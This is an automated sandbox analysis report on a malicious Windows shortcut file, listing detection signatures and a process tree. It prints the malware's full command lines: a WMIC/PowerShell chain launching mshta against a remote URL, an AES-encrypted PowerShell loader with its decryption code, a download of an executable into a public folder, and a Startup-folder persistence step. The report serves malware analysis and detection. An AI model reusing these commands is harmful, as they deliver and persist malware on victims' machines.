Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lKin1m7Pf2.lnk

Overview

General Information

Sample name:lKin1m7Pf2.lnk
renamed because original name is a hash value
Original sample name:2ddf3f1022cce6aa5fd6c09b5275e47e.lnk
Analysis ID:1579656
MD5:2ddf3f1022cce6aa5fd6c09b5275e47e
SHA1:13c4b35087244077015a33b25d2ab5f054f44988
SHA256:7ffbec4e1d8aacb3a386573d2c90ab9d1d89605a82ecd7dc524c178377ac6043
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 3524 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3904 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 4276 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 3800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 7360 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 7576 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7756 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1616,i,16373349634998890577,12593525989554583629,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • BnQwAP.exe (PID: 7352 cmdline: "C:\Users\user\AppData\Roaming\BnQwAP.exe" MD5: 9624FB616EDBE0DBAFD24F26424CA9E8)
              • powershell.exe (PID: 5544 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 3428 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Guard.exe (PID: 7256 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                  • cmd.exe (PID: 5544 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • MpCmdRun.exe (PID: 7352 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
              • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 5328 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 7220 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3428, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7256, ProcessName: Guard.exe
Sigma detected: Execution of Powershell Script in Public Folder
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 3428, ProcessName: powershell.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7256, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 5544, ProcessName: cmd.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1, CommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/duychuan1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6200, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/duychuan1, ProcessId: 4276, ProcessName: mshta.exe
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 3428, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BnQwAP.exe" , ParentImage: C:\Users\user\AppData\Roaming\BnQwAP.exe, ParentProcessId: 7352, ParentProcessName: BnQwAP.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5544, ProcessName: powershell.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B2
Sigma detected: Suspicious Process Created Via Wmic.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')", ProcessId: 3524, ProcessName: WMIC.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 5328, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5544, TargetFilename: C:\Users\Public\Guard.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B2
Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 7220, ProcessName: 